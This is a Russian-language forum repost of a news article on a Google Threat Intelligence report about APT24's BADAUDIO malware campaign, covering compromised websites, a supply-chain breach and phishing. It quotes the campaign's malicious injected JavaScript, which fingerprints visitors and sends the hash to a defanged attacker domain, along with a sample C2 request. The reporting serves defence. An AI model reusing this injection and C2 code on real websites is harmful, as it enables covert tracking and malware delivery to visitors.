«Обновите Chrome для защиты» — самая опасная кнопка интернета.

Support81

Модератор
Как цифровая мафия грабила корпорации через поддельные апдейты.
Apt24



Команда Google Threat Intelligence Group представила подробный разбор многолетней кибершпионской кампании, связанной с группировкой APT24. По их данным, в течение 3 лет эта команда последовательно распространяет вредоносный загрузчик BADAUDIO, который применяется для закрепления в сетях жертв и дальнейшего развертывания инструментов удалённого управления.

За время наблюдений вектор распространения заметно усложнился. На ранних этапах злоумышленники опирались на массовый взлом легитимных сайтов, превращая их в площадки для установки вредоносного JavaScript. Позже схема расширилась: возникли поставочные атаки через тайваньскую маркетинговую компанию, а также серия фишинговых писем, направленных на конкретных сотрудников разных организаций.

BADAUDIO представляет собой загрузчик на C++, работающий в роли первой стадии. Он устанавливает сетевое соединение с сервером управления, собирает данные о системе и, используя встроенный ключ AES, шифрует эти сведения. После отправки зашифрованного блока в cookie-параметре загрузчик получает полезную нагрузку, расшифровывает её тем же ключом и выполняет в оперативной памяти. В одном из эпизодов такой нагрузкой оказался Cobalt Strike Beacon, однако специалисты подчёркивают, что его использование не является универсальным.

Пример запроса, приведённый GTIG:

GET https://wispy[.]geneva[.]workers[.]dev/pub/static/img/merged?version=65feddea0367 HTTP/1.1
Host: wispy[.]geneva[.]workers[.]dev
Cookie: SSID=0uGjnpPHjOqhpT7PZJHD2WkLAxwHkpxMnKvq96VsYSCIjKKGeBfIKGKpqbRmpr6bBs8hT0ZtzL7/kHc+fyJkIoZ8hDyO8L3V1NFjqOBqFQ==
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache


Вредонос также может использовать иной формат идентификатора, который вставляется в параметры запроса, чтобы операторы могли отслеживать конкретные заражённые узлы.

Код загрузчика заметно затрудняет анализ благодаря технике выпрямления управления. Эта схема разрушает обычную структуру программы и заменяет её набором разрозненных блоков, выполнение которых определяется центральным управляющим фрагментом. Из-за этого автоматический анализ и реверс-инжиниринг требуют значительно больше времени.

BADAUDIO чаще всего загружается как DLL через подмену порядка поиска библиотек по механизму DLL Search Order Hijacking (MITRE ATT&CK T1574.001). В свежих образцах вредоносная библиотека упакована в зашифрованный архив вместе с BAT, VBS и LNK-файлами, которые автоматизируют копирование легитимного EXE и DLL в пользовательские каталоги, создают запись автозапуска и запускают нелегитимную библиотеку через сайдлоадинг. Такой подход уменьшает количество очевидных признаков компрометации.

Google подтвердила, что в одном из случаев полезная нагрузка представляла собой Cobalt Strike Beacon. В конфигурации маяка нашли watermark, ранее встречавшийся в другой кампании APT24. Это значение формируется на основе файла CobaltStrike.auth и позволяет связывать разные инциденты с одной сборкой инструмента.

Кампания развивается уже несколько лет и включает комбинацию методов: взлом сайтов, поставочные атаки и целевые фишинговые письма. Каждая из веток использует собственную систему фильтрации жертв и проверки окружения.

Первое массовое использование BADAUDIO через взломанные сайты Google зафиксировала в ноябре 2022 года. Было обнаружено свыше 20 ресурсов разной тематики. Во все сайты внедряли модифицированный JavaScript, который включал этап фильтрации по операционной системе и браузеру. В результате цепочка активировалась только для Windows.

Фрагмент JavaScript из отчета GTIG:

$(window).ready(function() {
var userAgent = navigator.userAgent;
var isIE = userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1;
var isEdge = userAgent.indexOf("Edge") > -1 && !isIE;
var isIE11 = userAgent.indexOf('Trident') > -1 && userAgent.indexOf("rv:11.0") > -1;
var isMac = userAgent.indexOf('Macintosh') > -1;
var isiPhone = userAgent.indexOf('iPhone') > -1;
var isFireFox = userAgent.indexOf('Firefox') > -1;
if (!isIE && !isEdge && !isIE11 && !isMac && !isiPhone && !isFireFox) {
var tag_script = document.createElement("script");
tag_script.type = "text/javascript";
tag_script.src = "https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@2/dist/fingerprint2.min.js";
tag_script.onload = "initFingerprintJS()";
document.body.appendChild(tag_script);
if (typeof(callback) !== "undefined") {
tag_script.onload = function() {
callback();
};
}
function callback() {
var option = {
excludes: {
screenResolution: true,
availableScreenResolution: true,
enumerateDevices: true
}
};
new Fingerprint2.get(option, function(components) {
var values = components.map(function(component) {
return component.value;
});
var murmur = Fingerprint2.x64hash128(values.join(''), 31);
var script_tag = document.createElement("script");
script_tag.setAttribute("src", "https://www[.]twisinbeth[.]com/query.php?id=" + murmur);
document.body.appendChild(script_tag);
});
}
}
});


Скрипт собирал характеристики браузера и вычислял хеш по алгоритму MurmurHash3, после чего отправлял идентификатор на домен злоумышленников. Если параметры подходили под требования, пользователь видел ложное окно «обновления» Chrome, предлагавшее загрузить BADAUDIO.

В июле 2024 года APT24 взломала региональную фирму, поставлявшую JavaScript-библиотеки для анализа трафика и вспомогательных функций веб-сайтов. Этот взлом затронул свыше 1000 доменов. Причём в течение года компания пережила несколько повторных компрометаций, что демонстрирует упорство операторов.

В первой версии вредоносный код внедрили в популярную библиотеку с использованием домена-опечатки, имитирующего ресурс CDN (MITRE ATT&CK T1195.001). В другом случае злоумышленники спрятали обфусцированный JavaScript внутри JSON-файла, который затем подгружался и выполнялся через скомпрометированный скрипт. Это позволяло скрывать вредоносный код в файле, который обычно не воспринимается как исполняемый.

Библиотека FingerprintJS2 снова генерировала x64hash128-отпечатки устройств (MITRE ATT&CK T1082). Далее происходила отправка данных методом POST в Base64 (MITRE ATT&CK T1041). Команда управления выдавала ссылку на следующий фрагмент цепочки, который перенаправлял пользователя на страницу загрузки BADAUDIO (MITRE ATT&CK T1105).

Кроме атак через сайты APT24 проводила фишинговые кампании, используя письма от имени благотворительной организации. В других эпизодах злоумышленники распространяли зашифрованные архивы через Google Drive и OneDrive. Почтовая фильтрация Google автоматически отправляла такие письма в раздел «Спам» и тем самым снижала результативность рассылок. Для отслеживания реакции людей злоумышленники встраивали пиксель-трекинг.

Google включила задействованные домены, сайты и файлы в блок-лист Safe Browsing, что защищает пользователей браузеров, использующих эту инфраструктуру. Компания также отправила уведомления пострадавшим организациям, предоставив технические детали и рекомендации по устранению последствий.

В конце отчета приведены индикаторы компрометации: контрольные суммы JavaScript-файлов, хэши бинарников BADAUDIO, адреса серверов управления, домены промежуточной инфраструктуры и watermark Cobalt Strike Beacon. Дополнительно опубликованы YARA-правила, предназначенные для поиска разных версий загрузчика.
Подробнее: https://www.securitylab.ru/news/566430.php
 
Последнее редактирование:
Похожие темы
Support81 Срочно обновите Chrome: новый 0day раскрывает конфиденциальные данные Новости в сети 0
Admin Интересно Ваши планёрки станут достоянием общественности (если срочно не обновите Yealink). Новости в сети 0
Support81 У вас роутер ASUS и используете VPN? Обновите прошивку 1.1.2.3_1010 — 3 модели пускают хакеров без пароля Новости в сети 0
Admin Интересно Google выпустил экстренное обновление браузера Chrome, закрыв 31 уязвимость. Новости в сети 0
Admin Интересно Google выпустил обновление для Chrome, устраняющее уязвимость нулевого дня. Новости в сети 0
Admin Интересно Новый стилер VoidStealer обходит защиту Chrome, перехватывая мастер-ключ. Новости в сети 0
Admin Интересно Google устранил две уязвимости нулевого дня в браузере Chrome. Новости в сети 0
Admin Интересно Кто владеет вашим расширением для Chrome? Исследователи предупреждают о превращении проектов в вредоносное ПО. Новости в сети 0
Admin Интересно Уязвимость в Chrome позволяла вредоносным расширениям получать доступ к файлам через Gemini. Новости в сети 0
Admin Интересно Google внедряет квантово-устойчивые сертификаты для HTTPS в Chrome. Новости в сети 0
Admin Интересно С такими помощниками и врагов не надо. Почему расширения для ChatGPT в Chrome могут быть опасны. Новости в сети 0
Admin Интересно Секретные настройки браузера для боссов: как вычистить всё лишнее из Chrome и Firefox без сомнительных форков. Новости в сети 0
Admin Статья Подборка материалов по архитектуре V8\Chrome - для исследователей уязвимостей Уязвимости и взлом 0
Admin Интересно Gemini лезет из каждой дыры Chrome? Вот как убить все ИИ-кнопки и вернуть нормальный браузер. Новости в сети 0
Support81 Призрак в системе: Snake Keylogger опустошает Chrome, Edge и Firefox Новости в сети 0
Support81 Chrome, Firefox и Edge: как Flesh Stealer стал ночным кошмаром для браузеров Новости в сети 0
Support81 0Day в Chrome опустошает криптокошельки по всему миру Новости в сети 0
Support81 0day-эксплойт для Chrome выставлен на продажу за $1 000 000 Новости в сети 0
El_IRBIS Интересно Отключаем Google Ad Topics в Chrome: Шаг за шагом инструкция с практическим применением. Анонимность и приватность 0
E Microsoft Defender ATP принял обновление для Chrome за троянское ПО Новости в сети 1
G Интересно [Chrome] режим Инкогнито по ярлыку в Windows. Анонимность и приватность 0
S Echelon Stealer v6.2.5 + Clipper +Chrome(v80) - source c отправкой на MEGA ! Вирусология 12
Z Интересно Chrome Flags: Security Tools Анонимность и приватность 0
S Команда Chrome работает над новой функцией Новости в сети 0
M Darknet на базе Chrome Анонимность и приватность 14
B Google объявила, что Chrome будет помечать быстрые и медленные сайты Новости в сети 2
M NoScript для Chrome Анонимность и приватность 0
M Бесплатный VPN для Google Chrome Анонимность и приватность 0
A Стиллер паролей для Chrome и Firefox Уязвимости и взлом 0
A Google chrome будет блокировать слишком тяжёлую рекламу Новости в сети 0
G Отключение сервиса слежки и сканирования в Google Chrome Полезные статьи 0
G Воруем пароли из Google Chrome Полезные статьи 1
Admin Полезные плагины для Google Chrome Полезные статьи 0
A Chrome Cookies Read C# Программирование 1
E Скрипт полной блокировки Google Chrome hack Полезные статьи 5
Admin Интересно Google заблокировал 8,3 млрд рекламных объявлений в 2025 году и представил обновления для Android 17. Новости в сети 0
Admin Интересно Киберпреступники используют платформу для автоматизации телефонного мошенничества. Новости в сети 0
Admin Интересно GitHub представил Stacked PRs для упрощения проверки кода. Новости в сети 0
Admin Интересно Злоумышленники используют платформу n8n для фишинга и распространения вредоносного ПО. Новости в сети 0
Admin Интересно Милла Йовович создала инструмент для памяти ИИ MemPalace, но разработчики сомневаются. Новости в сети 0
Admin Интересно Reddit вызван в секретный суд для раскрытия личности анонимного пользователя, критикующего ICE. Новости в сети 0
Admin Интересно Северокорейская группа APT37 использует социальную инженерию в Facebook для распространения вредоносного ПО. Новости в сети 0
Admin Интересно Хакеры используют письма от GitHub и Jira для кражи данных. Новости в сети 0
Admin Интересно Google представила технологию для защиты от кражи куки-файлов. Новости в сети 0
Admin Интересно Купили камеру для безопасности, а она «дудосит» Пентагон. Ирония эпохи интернета вещей. Новости в сети 0
Admin Интересно Adobe выпустила экстренные обновления для уязвимости Acrobat Reader. Новости в сети 0
Admin Интересно Кампания GlassWorm эволюционировала, используя Zig-дроппер для заражения инструментов разработчиков. Новости в сети 0
Admin Интересно TikTok превратился в поле битвы для спецслужб и ботоферм. Новости в сети 0
Admin Интересно MemPalace: Милла Йовович запустила открытый инструмент для долгосрочной памяти ИИ. Новости в сети 0
Admin Интересно Спецслужбы используют мобильные игры для слежки за пользователями. Новости в сети 0

Название темы